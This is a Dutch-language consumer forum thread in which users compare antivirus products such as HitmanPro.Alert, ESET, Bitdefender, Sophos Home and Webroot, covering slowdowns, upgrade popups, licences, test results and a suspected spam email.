Heb het idee dat HitmanProAlert mijn systeem behoorlijk vertraagt, zelfs indien alle componenten worden uitgeschakeld binnen HMPA. Een uninstall lijkt mijn systeem een stuk sneller te maken.

Ervaren jullie dit ook?

Acties:
  • 0 Henk 'm!
Cyb schreef op vrijdag 03 juni 2016 @ 20:25:
Heb het idee dat HitmanProAlert mijn systeem behoorlijk vertraagt, zelfs indien alle componenten worden uitgeschakeld binnen HMPA. Een uninstall lijkt mijn systeem een stuk sneller te maken.

Ervaren jullie dit ook?
Dat heb ik tot de laatste versie ook altijd ervaren. De vertraging is behoorlijk op sommige systemen, zeker wanneer je zaken als keystroke encryption etc aanzet. Of de laatste versie dit ook heeft weet ik niet. Ik ben er nog niet aan toe gekomen deze te testen.

Acties:
  • +1 Henk 'm!
Bor schreef op vrijdag 03 juni 2016 @ 21:46:
[...]

Dat heb ik tot de laatste versie ook altijd ervaren. De vertraging is behoorlijk op sommige systemen, zeker wanneer je zaken als keystroke encryption etc aanzet. Of de laatste versie dit ook heeft weet ik niet. Ik ben er nog niet aan toe gekomen deze te testen.
Keystroke encryptie zorgt bij mij soms voor delays tijdens typen en voor een trage alt-tab bij het switchen van applicaties, waardoor alt-tab praktisch gezien niet werkt. Maar heb het idee dat HMPA ook de webbrowser flink vertraagt, en als die open staat met wat tabs open, dan het hele systeem wordt vertraagd, alsof er te weinig ram beschikbaar is en je loopt te werken op een oude PC.

Ik had HMPA ook op mijn vorige Windows 8 installatie staan. Dat systeem was na een paar jaar traag geworden (zonder echt een oorzaak gevonden te hebben), ik had de laatste tijd toen ook HMPA op dat systeem draaien. Anderhalve maand geleden Windows 10 erop gezet met een full clean install, zonder upgrade. Tot mijn verbazing draaide het systeem super snel, browsen ging erg snel etc.
Misschien iets van een week geleden HMPA er weer op gezet, en opvallend herkende hij automatisch mijn vorige licentie (zonder iets ingevoerd te hebben), ondanks de clean install/format. Vermoedelijk dat de licentie automatisch online wordt opgehaald en misschien op basis van je computer profiel, mac adrres etc.
En ik merkte weer dat mijn systeem traag was geworden.
HMPA componenten uitgeschakeld, en het bleef traag. (Misschien dat ik nog een reboot had moeten doen.)
Nu HMPA er af, en het draait weer snel.
Ik zal nog eens proberen of ik een vertragend component kan vinden die dit veroorzaakt.

Acties:
  • 0 Henk 'm!

• GerardVanAfoort
  • Niet online

GerardVanAfoort

kalm aan

Deze downloads: HitmanPro.Alert 2.5.0 build 50 bèta versie niet, gratis, iets beperktere functies. Werkt niet op Windows 10!

NRG

Acties:
  • 0 Henk 'm!
GerardVanAfoort schreef op zaterdag 04 juni 2016 @ 11:55:
Deze downloads: HitmanPro.Alert 2.5.0 build 50 bèta versie niet, gratis, iets beperktere functies. Werkt niet op Windows 10!
Ik heb een betaalde. Was waarschijnlijk HitmanPro.Alert 3.1, welke Windows 10 ondersteunt.

Acties:
  • 0 Henk 'm!

• daffie82
Ik vind de vertraging heel goed meevallen hier. Merk niet echt iets.

Acties:
  • 0 Henk 'm!

• Sakete
  • Registratie: September 2002
  • Laatst online: 05-10 21:40
Wie van jullie heeft ervaring met Webroot? Ik heb de afgelopen tijd Bitdefender gebruikt, maar vind die eigenlijk toch aardig "intrusive". Bijvoorbeeld, als ik een online spel als Call of Duty wil spelen dan werkt de online modus alleen wanneer ik Bitdefender uitschakel. Best wel bizar.

Webroot lijkt redelijk goed uit de tests te komen en is verder heel erg licht en niet intrusive.

Acties:
  • +3 Henk 'm!

• ThinkPad
  • Nu online
Just sharing: ik vond de popups (om te upgraden naar betaalde versie) van Avira Free vrij vervelend worden bij elke boot van m'n systeem, maar lijkt nu opgelost te zijn met 'BGPKiller' :)

code:
1
2
3
4
5
[...]
[2016/06/10][10h41:00.650] : BGPKiller launched (v0.9.6.0)
[2016/06/10][10h41:00.650] : Waiting for unwanted processes : ipmgui.exe, avnotify.exe
[2016/06/10][10h42:07.303] : Process found (ipmgui.exe) --> Termination successful!
[2016/06/10][12h42:08.623] : Process found (ipmgui.exe) --> Termination successful!

[ Voor 116% gewijzigd door ThinkPad op 10-06-2016 16:40 ]

Acties:
  • 0 Henk 'm!

• MrV
  • Registratie: Augustus 2014
  • Laatst online: 21-02 15:53

MrV

Modbreak: knip. Zie losse topic. 1 vraag op 1 plaats is zat.

[ Voor 93% gewijzigd door F_J_K op 19-06-2016 20:24 ]

Dikke doei!

Acties:
  • 0 Henk 'm!

• gambieter
  • Registratie: Oktober 2006
  • Niet online

gambieter

Just me & my cat

En welke heb je zelf al bekeken, en waarom voldoen die niet? Meer eigen inzet = meer opbrengst.

I had a decent lunch, and I'm feeling quite amiable. That's why you're still alive.

Acties:
  • 0 Henk 'm!

Verwijderd

Panda Pro 2016 schakelt zichzelf regelmatig uit na updaten als ik mijn laptop 's nachts aan laat staan. Ik mis de pop up, omdat een mens moet slapen. Toch hangt mijn laptop zo'n 16 uur onbeschermd aan het web.
Klantenservice geeft een respons in de vorm van een link naar de FAQ, ofwel in het spaans, of in het zweeds of engels. Die FAQ biedt geen oplossing, die gaat over klantenzaken. Na 8 keer proberen te communiceren in alle talen, geef ik het op.
Zijn er mogelijkheden - behalve om mijn laptop steeds uit te zetten - om een reboot te forceren na een AV-update?
Of zijn er tips voor een andere lightweight AV? Ik koos juist voor panda omdat die zo weinig RAM vreet, maar die belasting staat helaas niet vaak in de tests vermeld. Ik zit wellicht verkeerd te kijken, een linkje of tip zou me al kunnen helpen.

Thanks!

Acties:
  • +1 Henk 'm!

• prinsvlad
Verwijderd schreef op maandag 20 juni 2016 @ 17:11:
Panda Pro 2016 schakelt zichzelf regelmatig uit na updaten als ik mijn laptop 's nachts aan laat staan. Ik mis de pop up, omdat een mens moet slapen. Toch hangt mijn laptop zo'n 16 uur onbeschermd aan het web.
Klantenservice geeft een respons in de vorm van een link naar de FAQ, ofwel in het spaans, of in het zweeds of engels. Die FAQ biedt geen oplossing, die gaat over klantenzaken. Na 8 keer proberen te communiceren in alle talen, geef ik het op.
Zijn er mogelijkheden - behalve om mijn laptop steeds uit te zetten - om een reboot te forceren na een AV-update?
Of zijn er tips voor een andere lightweight AV? Ik koos juist voor panda omdat die zo weinig RAM vreet, maar die belasting staat helaas niet vaak in de tests vermeld. Ik zit wellicht verkeerd te kijken, een linkje of tip zou me al kunnen helpen.

Thanks!
Via de Taakplanner kan je een reboot inplannen :

Press WinKey+R > type taskschd.msc and press Enter (it will launch Task Scheduler)
Left click from the right pane on the Task Scheduler Library > open Action from the top menu > New Folder... > name it MyTasks > click OK
Left click on the MyTasks > choose Action from menu > Create Basic Task... (it will open task wizard)
You can enter the Name , for example "Restart", and press Next
In Trigger section you can specify when you want to run your task, for example:
Select Daily , and press Next
Now you can specify the day, the hour and set to recur every day, after that press Next
In Action section you can choose what you want to run, for example restart your system, to do this:
choose Start a program , and press Next
in the Program/script field type shutdown /r , and press Next And that's all, you can press Finish

[ Voor 31% gewijzigd door prinsvlad op 20-06-2016 20:04 ]

Acties:
  • +1 Henk 'm!

Verwijderd

Bedankt prinsvlad! Ik ga er mee aan de slag.
Je hebt me nu al meer geholpen dan Panda customer service.

Acties:
  • +1 Henk 'm!

• prinsvlad
Verwijderd schreef op maandag 20 juni 2016 @ 22:25:
Bedankt prinsvlad! Ik ga er mee aan de slag.
Je hebt me nu al meer geholpen dan Panda customer service.
Je bent , zo lees ik op het forum van Panda , niet de enige , en erger het komt voor bij ogenschijnlijk alle Panda producten. Er zijn diverse rapportages van uitgeschakelde beveiliging bij mensen die de laptop of pc aan laten staan. Of dit ook daadwerkelijk is na een Signature database update of Programma update is onduidelijk.
Ik weet niet hoe lang je licentie nog loopt maar ik zou naar iets anders uitkijken. Wat je zoal doet op het internet (....) is van groot belang bij de keuze en of aanschaf van al dan wel of niet een betaald of ''gratis'' pakket. Ik heb jaren lang een betaald pakket gehad , maar ben daar vanaf gestapt. Simpelweg omdat er veel goede tot zeer goede gratis alternatieven zijn , maar je internet gedrag en je gevoel voor ''veiligheid'' hebben hier ook een aandeel in bij je besluitvorming die vaak pas goed vorm te geven is na zelf diverse programmatuur te hebben uitgeprobeerd.

Ik heb diverse uitgeprobeerd / gebruikt / aangeschaft :

Windows Defender > goed overzicht , simpel , weinig aan in te stellen , minimale bescherming t.o.v overige pakketten ( volgens de tests )

Qihoo 360 Essentials > Overzichtelijk , licht in gebruik , voldoende aanpassingsmogelijkheden , Chinese makelij en helaas dubieuze praktijken in het verleden.

ZoneAlarm Free > antivirus en firewall ( of een van beide ) simplistisch , firewall kan problematisch zijn.

Kaspersky Total IS ( betaald na transitie vorige AV ) > gedumpt , slechte ervaring , niet Spartaans genoeg , teveel modules op verschillende plaatsen.

Agnitum Outpost SS > opgeheven en vervangen door bovenstaande
.
Avast Free > te lang geleden , +7 jaar , geen oordeel nu

AVG Free > zie bovenstaande

Norton > te lang geleden , toen erg zwaar in gebruik , nu geen oordeel

En op dit ogenblik gebruik ik Sophos Home : een zeer minimalistische UI op het systeem , de instellingen kan men aanpassen via een WebInterface na een account te hebben aangemaakt op de website van Sophos.
Het fijne van Sophos , dat overigens goed scoort voor een gratis programma , is dat je meerdere apparaten kunt beheren als zijnde Administrator , alle installaties verlopen dan middels een jou gedeelde link om de Sophos Home UI te installeren op het betreffende systeem , deze apparaten staan dan in de beheer web interface waarop jij inlogd. Handig als je bijvoorbeeld niet wilt dat je kinderen ( of je partner ) bepaalde content op internet kunnen opzoeken / bekijken.

Uitgebreide en zeer snel reagerende ondersteuning. Tevens zijn ze graag op de hoogte van wat de eindgebruiker graag zou willen zien in een nieuwe versie van hun gratis product.
Sophos is voor mij een serieuze en prettige speler , die luistert naar de eindgebruiker.
Tot zover het hallelujah verhaal.......

Wat meespeelt is natuurlijk je internet gedrag , doe je ''stoute'' dingen , of probeer je veel ''niet-gratis-maar-toch-voor-niets'' programma's uit van dubieuze afkomst ,dan zal Windows Defender niet afdoende zijn , alhoewel de meningen daar over verschillen. Wel belangrijk vind ik , het gebruik van aanvullende bescherming , een second opinion dus , dat kan in meerdere vormen , denk hierbij aan MBAM , of Adguard.
De laatste draait standaard op mijn systeem , MBAM in geval van nood ( niet geïnstalleerd ). Adguard blocked tevens des gewenst reclames system-wide , en heeft ook een Browser Protection module.

Gratis is niet altijd beter , maar daarentegen , betaald zeker ook niet. Probeer eens een aantal programma's uit voor een aantal dagen ( niet gelijktijdig natuurlijk ) , en kijk kritisch naar gebruikservaring , gemak , gevoel.

Succes!!

[ Voor 5% gewijzigd door prinsvlad op 21-06-2016 00:18 ]

Acties:
  • 0 Henk 'm!

• jooncheez
  • Registratie: September 2007
  • Laatst online: 16-09 10:23
Sakete schreef op vrijdag 10 juni 2016 @ 16:33:
Wie van jullie heeft ervaring met Webroot? Ik heb de afgelopen tijd Bitdefender gebruikt, maar vind die eigenlijk toch aardig "intrusive". Bijvoorbeeld, als ik een online spel als Call of Duty wil spelen dan werkt de online modus alleen wanneer ik Bitdefender uitschakel. Best wel bizar.

Webroot lijkt redelijk goed uit de tests te komen en is verder heel erg licht en niet intrusive.
Ik draai zelf Webroot, juist omdat ik de meeste virusscanners zo intrusive vind. Webroot bevalt goed, ik krijg geen onnodige notificaties en hij lijkt heel licht te draaien. Ook geen lelijke/flashy ui.

Maar volgens mij kan je gewoon een trial installeren om het zelf even te proberen?

[XBO/PSN: BroedersKolk]

Acties:
  • 0 Henk 'm!

• Buzz_Fuzz
  • Registratie: Juni 2002
  • Laatst online: 12-10 20:15
Ik zou dit weekend de 2 PC's van m'n ouders willen upgraden, updaten naar Windows 10, en daar een nieuwe AV op installeren.

Ze hebben nu AVG Free draaien (niets meer). Ikzelf ook, maar ik zou daar vanaf willen owv die irritante popups en de al te gemakkelijke manier om per ongeluk naar de betalende versie up te graden, waarna ik weer mag aan komen draven om de boel te herinstalleren.
Daarnaast ondervind ik zelf ook issues met AVG & W10. Vaak kan ik geen enkel Explorer venster meer openen, en van Explorer vensters die al open stonden, kan ik bv plots geen schijf eigenschappen meer openen. Totdat ik een of ander AVG process kill, dan floepen er plots 5 Explorer vensters tevoorschijn...

Na het doorbladeren van dit topic zie ik echter door de bomen het bos niet meer. Ik gebruik al jaren AVG met heel occasioneel eens een MBAM run, maar blijkbaar geeft een antivirus & MBAM geen afdoende bescherming tegen cryptolockers en heb ik ook iets als Malwarebytes Anti-Exploit nodig.

Antivirus, anti-exploit, anti-malware, anti-rootkit, .... zucht.

Wat raden jullie aan voor m'n ouders? Iets dat gebruiksvriendelijk is en geen popups spammed. Iets dat niet uit 5 verschillende tools bestaat (want ik zal ze mogen gaan onderhouden), en iets dat geen stukken van mensen kost.

Dan dacht ik terug te gaan naar Avast wat ik 10 jaar terug nog heb gebruikt, maar die staat blijkbaar ook niet al te hoog aangeschreven en heeft ook popups.

Eset NOD32 schijnt goed te zijn, 41.15€ voor 3 PC's (enkel de AV, niet Smart Security), maar biedt deze voldoende bescherming tegen cryptolockers, drive-by downloads en ander gevaar of moet daar nog een 2e tool bij?

[ Voor 6% gewijzigd door Buzz_Fuzz op 22-06-2016 12:55 ]

My Road Trips through the United States, Canada & Iceland

Acties:
  • 0 Henk 'm!

• prinsvlad
Buzz_Fuzz schreef op woensdag 22 juni 2016 @ 12:51:
Ik zou dit weekend de 2 PC's van m'n ouders willen upgraden, updaten naar Windows 10, en daar een nieuwe AV op installeren.

Ze hebben nu AVG Free draaien (niets meer). Ikzelf ook, maar ik zou daar vanaf willen owv die irritante popups en de al te gemakkelijke manier om per ongeluk naar de betalende versie up te graden, waarna ik weer mag aan komen draven om de boel te herinstalleren.
Daarnaast ondervind ik zelf ook issues met AVG & W10. Vaak kan ik geen enkel Explorer venster meer openen, en van Explorer vensters die al open stonden, kan ik bv plots geen schijf eigenschappen meer openen. Totdat ik een of ander AVG process kill, dan floepen er plots 5 Explorer vensters tevoorschijn...

Na het doorbladeren van dit topic zie ik echter door de bomen het bos niet meer. Ik gebruik al jaren AVG met heel occasioneel eens een MBAM run, maar blijkbaar geeft een antivirus & MBAM geen afdoende bescherming tegen cryptolockers en heb ik ook iets als Malwarebytes Anti-Exploit nodig.

Antivirus, anti-exploit, anti-malware, anti-rootkit, .... zucht.

Wat raden jullie aan voor m'n ouders? Iets dat gebruiksvriendelijk is en geen popups spammed. Iets dat niet uit 5 verschillende tools bestaat (want ik zal ze mogen gaan onderhouden), en iets dat geen stukken van mensen kost.

Dan dacht ik terug te gaan naar Avast wat ik 10 jaar terug nog heb gebruikt, maar die staat blijkbaar ook niet al te hoog aangeschreven en heeft ook popups.

Eset NOD32 schijnt goed te zijn, 41.15€ voor 3 PC's (enkel de AV, niet Smart Security), maar biedt deze voldoende bescherming tegen cryptolockers, drive-by downloads en ander gevaar of moet daar nog een 2e tool bij?
Zie mijn bovenstaande post

Acties:
  • 0 Henk 'm!

• Buzz_Fuzz
Vind over Sophos Home vrij weinig terug eerlijk gezegd.

Ik ben voorlopig met Avira Free gegaan in combinatie met Malwarebytes Anti-Exploit Free. De browser extensie van Avira heb ik wel uitgeschakeld, vind ik irritant. MBAM staat sowieso geïnstalleerd als extra on-demand optie, maar die loop ik maar als ik iets onfris vermoed.

Maar vanwege de aantrekkelijke deals op Dealarious vroeg ik mij nu af wat Bitdefender Antivirus Plus (20€/3pc's/1yr) meer te bieden zou hebben dan bovenstaande combo...

[ Voor 12% gewijzigd door Buzz_Fuzz op 22-06-2016 23:38 ]

Acties:
  • 0 Henk 'm!

• prinsvlad
Buzz_Fuzz schreef op woensdag 22 juni 2016 @ 23:37:
Vind over Sophos Home vrij weinig terug eerlijk gezegd.

Ik ben voorlopig met Avira Free gegaan in combinatie met Malwarebytes Anti-Exploit Free. De browser extensie van Avira heb ik wel uitgeschakeld, vind ik irritant. MBAM staat sowieso geïnstalleerd als extra on-demand optie, maar die loop ik maar als ik iets onfris vermoed.

Maar vanwege de aantrekkelijke deals op Dealarious vroeg ik mij nu af wat Bitdefender Antivirus Plus (20€/3pc's/1yr) meer te bieden zou hebben dan bovenstaande combo...
https://www.sophos.com/en-us/lp/sophos-home.aspx

Acties:
  • 0 Henk 'm!

• Buzz_Fuzz
Ja dat lukte mij ook wel...
Ziet er wel leuk uit, met dat dashboard, maar als ik op av-comparatives kijk, scoort die wel altijd lager, soms een pak lager, dan Avira of Bitdefender bv, terwijl de performance penalty ook nog eens hoger is.

Acties:
  • 0 Henk 'm!

• prinsvlad
Buzz_Fuzz schreef op donderdag 23 juni 2016 @ 00:20:
Ja dat lukte mij ook wel...
Ziet er wel leuk uit, met dat dashboard, maar als ik op av-comparatives kijk, scoort die wel altijd lager, soms een pak lager, dan Avira of Bitdefender bv, terwijl de performance penalty ook nog eens hoger is.
De score is relatief en altijd een moment opname , qua performance impact klopt het idd , maar ja voor niets gaat de zon op , en de systemen die ik beheer ( prive ) zijn snel genoeg en geoptimaliseerd zodat de impact nagenoeg niet merkbaar is.

Acties:
  • 0 Henk 'm!

• Wouterkaas
  • Registratie: April 2009
  • Laatst online: 09:37
Voor iedereen die verbonden is aan een hogeronderwijsinstelling, of iemand kent die dat is: via Surfspot kun je heel goedkoop licenties kopen voor virusscanners. Ik heb nu 2 jaar ESET Smart Security voor 35 euro. Houd ik op de valreep nog iets moois over aan mijn uni-account. :)

Acties:
  • 0 Henk 'm!

• Cartman!
  • Registratie: April 2000
  • Niet online
Sinds een paar weken krijg ik steeds popups van Bitdefender of ik niet naar een uitgebreider pakket wil upgraden en vraag me af hoe ik dit uit zet. Ik ben er totaal niet van gediend dat ik die popups krijg en is van mij zeker van invloed of ik over een half jaar wel zal verlengen, schande. Iemand een idee?

Acties:
  • 0 Henk 'm!

• robcoenen
  • Laatst online: 13-10 12:46
ESET heeft afgelopen week hun producten vernieuwd. De nieuwe consumentenlijn biedt twee nieuwe producten, namelijk: ESET Internet Security (EIS) en ESET Smart Security Premium (ESSP). ESET Internet Security is de vervanger van ESET Smart Security. ESET Smart Security Premium is een nieuw product en bevat nog meer beschermingsfuncties.

Bekijk hier de nieuwe functies en de verschillen tussen de versies:
Afbeeldingslocatie: https://s12.postimg.org/usy191x59/image.png

Acties:
  • 0 Henk 'm!

Verwijderd

Hallo,
Kort vraagje als dit het goede topic daarvoor is.
Ik heb momenteel ESET NOD32. Heb in het topic al gezien dat er mensen zijn die dit samen met Hitman Pro gebruiken. Is het dan het beste om de standaard hitman pro te nemen, of de hitman pro alert? Of geeft de alert problemen omdat die altijd actief is, net zoals ESET. En zijn er verder nog dingen waar ik bij de standaard hitman pro en eset op moet letten, of gaat dat altijd goed?

Mijn Eset heeft laatst wat dingen tegen gehouden maar vind verder niks. Zal het graag even dubbel willen checken dus jullie hulp is welkom. Voor in de toekomst is het misschien wel zo prettig om er nog iets naast te hebben, daarom deze vraag.

Acties:
  • 0 Henk 'm!
Verwijderd schreef op zondag 18 september 2016 @ 22:04:
Hallo,
Kort vraagje als dit het goede topic daarvoor is.
Ik heb momenteel ESET NOD32. Heb in het topic al gezien dat er mensen zijn die dit samen met Hitman Pro gebruiken. Is het dan het beste om de standaard hitman pro te nemen, of de hitman pro alert? Of geeft de alert problemen omdat die altijd actief is, net zoals ESET. En zijn er verder nog dingen waar ik bij de standaard hitman pro en eset op moet letten, of gaat dat altijd goed?

Mijn Eset heeft laatst wat dingen tegen gehouden maar vind verder niks. Zal het graag even dubbel willen checken dus jullie hulp is welkom. Voor in de toekomst is het misschien wel zo prettig om er nog iets naast te hebben, daarom deze vraag.
Hitman Pro.Alert kun je niet los kopen helaas. Je koopt altijd het complete Hitman product. Ik heb zelf geen ervaringen met het draaien van Alert naast ESET maar kan wel opmerken dat Alert niet altijd even fijn samenwerkt met andere software met instabiliteit ten gevolge. Hitman Pro wordt veel gebruikt als second opinion scanner.

Acties:
  • 0 Henk 'm!

Verwijderd

Bedankt voor de snelle reactie! Dus het lijkt jou het verstandigste om naast de ESET die eenmalige Hitman Pro een keer te laten runnen? En in de toekomst de standaard hitman pro aan te schaffen en niet de uitgebreide alert versie om problemen te voorkomen. En ik hoef verder niks tijdelijk uit te zetten om clashes te voorkomen bij eset, het is erop gemaakt dat het samen werkt?

[ Voor 24% gewijzigd door Verwijderd op 18-09-2016 22:15 ]

Acties:
  • 0 Henk 'm!
Je zou Alert ook naast ESET kunnen draaien hoor. Ik kan alleen niet op voorhand garanderen dat je geen issues krijgt. Waarom probeer je niet gewoon een trial versie? Op die manier kun je zonder kosten zelf ervaring opdoen.

Acties:
  • +2 Henk 'm!

• robcoenen
Ook Bitdefender heeft vandaag een nieuwe versie uitgebracht.
Afbeeldingslocatie: https://s17.postimg.org/9qrraf8an/image.png

[ Voor 15% gewijzigd door robcoenen op 20-09-2016 14:26 ]

Acties:
  • 0 Henk 'm!

• daffie82
Verwijderd schreef op zondag 18 september 2016 @ 22:11:
Bedankt voor de snelle reactie! Dus het lijkt jou het verstandigste om naast de ESET die eenmalige Hitman Pro een keer te laten runnen? En in de toekomst de standaard hitman pro aan te schaffen en niet de uitgebreide alert versie om problemen te voorkomen. En ik hoef verder niks tijdelijk uit te zetten om clashes te voorkomen bij eset, het is erop gemaakt dat het samen werkt?
Heb hier ESET (v8) samen draaien met Hitman Pro Alert. Geen problemen hier.

• robcoenen
Nieuwe AV-TEST van augustus 2016 ;)
Details

Afbeeldingslocatie: https://s12.postimg.org/ki4vxc75p/image.png
Die is niet nieuw en neemt nog oude versies mee van bijvoorbeeld Bitdefender die onlangs naar 2017 is geupdate.

• robcoenen
De versies zijn in sommige gevallen dan niet de meest recente (zie ook ESET bijv.) maar deze test is wel nieuw. Vandaag namelijk uitgebracht.
Jammer dat ze niet testen op privacy. Een karakteristiek die steeds belangrijker aan het worden is. Ik heb liever eentje die mijn privacy niet schendt, dan een top virusscanner (top kwa security) maar die tegelijkertijd wel je complete privacy schendt door je surfgedrag aan derden door te verkopen en je bestanden te uploaden naar derden.

Hier lijken ze wel recent wat getest te hebben: https://www.av-test.org/e...tion-or-virus-protection/
Maar individuele testresultaten staan er niet bij...
[...]
In an elaborate analysis, the AV-TEST Institute evaluated the English-language privacy policies of 26 antivirus programs, thus providing a comprehensive market overview. In reality, only 24 privacy policies were evaluated, as two of the security packages did not include any policy whatsoever, neither on the manufacturers' websites nor during installation of the programs.
[...]
Far more data collected than necessary
[...]
Sexual preferences and fingerprints collected

Many providers, however, overshoot the mark by far: In examinations conducted by AV-TEST, manufacturers even allowed themselves access to biometric data stored on the user computer.
[...]
Users under observation

Also in terms of recording user behavior, manufacturers tend to generously help themselves to data: 15 out of 24 manufacturers require access to the browser history of their users. Six want access to their search queries. Five providers reserve the right to sift through emails. No less than two reserve the right to full access to the personal address book. Furthermore, antivirus manufacturers are interested in social media data of their customers, including account data, as well as postings. One manufacturer even claimed the right to publish entries on behalf of users. Some also want to be involved in chat sessions, or even have access to the chat history.
[...]
In 10 out of 24 privacy policies, manufacturers reserve the right to compile "user statistics". It is not clearly defined, however, which data is collected here, i.e. whether it involves the use of the security program itself, use of the device or the collection of entirely different data.
Voorlopig heb ik kwa privacy het meeste vertrouwen in Emsisoft.

[ Voor 51% gewijzigd door Cyb op 28-09-2016 12:36 ]

• Chiel
  • Registratie: Augustus 2000
  • Laatst online: 12-10 15:00
Ik heb eergisteren een bitdefender total security 2016 licence voor 3 pc`s aangeschaft. Die zal vast niet werken op de 2017 versie toch?, is ook niet zo`n ramp want de prijs was ook laag. Ik heb de downloadknop in de Bitdefender central gebruikt en ik zag dat ik meteen een maandlicentie kreeg. De 2016 versie die ik al al geïnstalleerd had staan was ook meteen weer voor een maand actief. Gaat nou de licence van een jaar pas in op het moment dat ik de code invoer? Want dan wacht ik eerst even totdat de maandlicentie is verlopen :)

Acties:
  • +1 Henk 'm!
De 2016 licentie werkt wanneer nog geldig ook gewoon op de 2017 versie. Je betaalt min of meer het abonnement en hebt daarbij de mogelijkheid de nieuwste versie te draaien.

Acties:
  • 0 Henk 'm!

• Meg
  • Registratie: September 2016
  • Niet online

Meg

418: “I’m a teapot”

Ik maak zelf langere tijd gebruik van Emsisoft Internet Security, nadat ik als cadeau de Anti-Malware variant mocht ontvangen, vervolgens heb ik deze voor 10€ een upgrade gegeven naar de Internet Security versie welke een firewall heeft ingebouwd.

Door het referral systeem van het programma heb ik inmiddels een licentie die 24-2-2015 is gestart en eindigt op 19-11-2014.

Nog nooit problemen gehad hiermee en de support is uitstekend. :)

Afbeeldingslocatie: https://puu.sh/rsKFd/835c1e68c7.png

"If you lose your left arm your right arm will be left."
"The difference between stupidity and genius is that genius has its limits." - Albert Einstein
"I don't need oxygen, I only need O2."

Acties:
  • 0 Henk 'm!

• The Executer
  • Registratie: Juli 2005
  • Laatst online: 06:30

The Executer

Lekker belangrijk!

Cartman! schreef op zondag 21 augustus 2016 @ 15:14:
Sinds een paar weken krijg ik steeds popups van Bitdefender of ik niet naar een uitgebreider pakket wil upgraden en vraag me af hoe ik dit uit zet. Ik ben er totaal niet van gediend dat ik die popups krijg en is van mij zeker van invloed of ik over een half jaar wel zal verlengen, schande. Iemand een idee?
Volgens mij kon je deze in de instellingen uit zetten. Heb zelf ook zoiets gehad.

Zo krijg ik nu na elke boot een pop-up "Bitdefender. Awake". Heb in de instellingen gekeken maar kon hier niets over terug vinden

"We don't make mistakes; we just have happy accidents" - Bob Ross

Acties:
  • 0 Henk 'm!

• daffie82
Misschien niet het goede topic, maar hoop dat iemand kan helpen.

Krijg een email van contact@leads-efficiency.com om te melden dat ik een bon van 100 euro kan winnen voor bol.com.
Met een link waar je op kan klikken die begint met http://r.sendinblue.lds-be.com/...

Lijkt me erg fake, niet?

Acties:
  • +1 Henk 'm!

• The_Worst
  • Nu online

The_Worst

Unox

@Hierboven

Zonder de rest van de mail valt er niet heel veel over te zeggen maar als je het niet vertrouwd uiteraard geen gegevens invullen.

Van de week mijn licentie voor Eset vernieuwd en uitgebreid naar Multi-device security. Redelijk recent een nieuwe laptop aangeschaft en Windows Defender vertraagde het downloaden van grotere bestanden aanzienlijk. Nu met Eset heb ik er gelukkig geen last meer van. Alleen lijkt het geheugengebruik wel wat hoger maar dat is lastig vergelijken omdat Windows Defender onderdeel is van Windows.

If you hide your whole life, you'll forget who you even are. Uplay: TheWorstNL | Steam + Origin + PSN: The_Worst_NL

Acties:
  • +1 Henk 'm!
daffie82 schreef op vrijdag 30 september 2016 @ 14:36:

Krijg een email van contact@leads-efficiency.com om te melden dat ik een bon van 100 euro kan winnen voor bol.com.
Met een link waar je op kan klikken die begint met http :// r.sendinblue. lds-be .com/...

Lijkt me erg fake, niet?
Fake, daar zou ik wel vanuit gaan, en ook al is het marketing, ze willen hoe dan ook gewoon je gegevens hebben. Het is ook niet echt handig om die link hier te plaatsen, dat levert hen meer bezoekers op (al dan niet via SEO), en jou meer spam. (Zodra iemand of een bot die link bezoekt, weten zij, de spammers, dat jou emailadres actief is, en krijg je nog meer spam.)

Acties:
  • 0 Henk 'm!

• daffie82
Cyb schreef op vrijdag 30 september 2016 @ 15:33:
[...]

Fake, daar zou ik wel vanuit gaan, en ook al is het marketing, ze willen hoe dan ook gewoon je gegevens hebben. Het is ook niet echt handig om die link hier te plaatsen, dat levert hen meer bezoekers op (al dan niet via SEO), en jou meer spam. (Zodra iemand of een bot die link bezoekt, weten zij, de spammers, dat jou emailadres actief is, en krijg je nog meer spam.)
Thanks.

Uiteraard niet de volledige link hier geplaatst !
Komt nog een heleboel achter...

Acties:
  • +1 Henk 'm!

• Meg
  • Registratie: September 2016
  • Niet online

Meg

418: “I’m a teapot”

daffie82 schreef op vrijdag 30 september 2016 @ 14:36:

Met een link waar je op kan klikken die begint met http://r.sendinblue.lds-be.com/...

Lijkt me erg fake, niet?
Dat is spam. Kan ik je zo al zeggen, zonder de link, noch de mail volledig te zien.

"If you lose your left arm your right arm will be left."
"The difference between stupidity and genius is that genius has its limits." - Albert Einstein
"I don't need oxygen, I only need O2."

Acties:
  • 0 Henk 'm!

• ThinkPad
  • Nu online
Iemand ervaring met de gratis versie van Bitdefender? Op de website word hij niet genoemd, maar zag hier wat: https://forum.bitdefender...ed-romanian-language-fix/
(dat gedoe met .xml aanpassen is niet nodig, gewoon die .exe downloaden, internet uitzetten en als hij begint te zeuren dat hij geen internet heeft zet je internet weer aan en heb je hem in het Engels ipv Roemeens).

Lijkt goed geinstalleerd te zijn nu, maar ik las elders ook wat over dat de nieuwe beta nog niet is uitgebracht en dat deze huidige versie voor BSOD's kan zorgen op W10 ? Iemand ervaring met deze versie?

Edit: Rechtermuisknop op het trayicon en dan 'About' laat zien dat het versie 1.0.21.1109 is overigens.

[ Voor 7% gewijzigd door ThinkPad op 04-10-2016 20:26 ]

Acties:
  • +1 Henk 'm!

• Donovan662
  • Registratie: November 2010
  • Laatst online: 30-07 18:07
Voor €20,98 hoef je het niet te laten. Zojuist weer 2 jaartjes toegevoegd aan huidige subscription. Loopt nu tot 2021. Gratis upgrades naar alle volgende versies. Draait hier naar tevredenheid op 3 laptops en 2 android devices.

https://store.bitdefender...URRENCY=EUR&CART=1&CARD=2

Acties:
  • 0 Henk 'm!
ThinkPadd schreef op dinsdag 04 oktober 2016 @ 20:17:
Iemand ervaring met de gratis versie van Bitdefender? Op de website word hij niet genoemd, maar zag hier wat: https://forum.bitdefender...ed-romanian-language-fix/
(dat gedoe met .xml aanpassen is niet nodig, gewoon die .exe downloaden, internet uitzetten en als hij begint te zeuren dat hij geen internet heeft zet je internet weer aan en heb je hem in het Engels ipv Roemeens).

Lijkt goed geinstalleerd te zijn nu, maar ik las elders ook wat over dat de nieuwe beta nog niet is uitgebracht en dat deze huidige versie voor BSOD's kan zorgen op W10 ? Iemand ervaring met deze versie?

Edit: Rechtermuisknop op het trayicon en dan 'About' laat zien dat het versie 1.0.21.1109 is overigens.
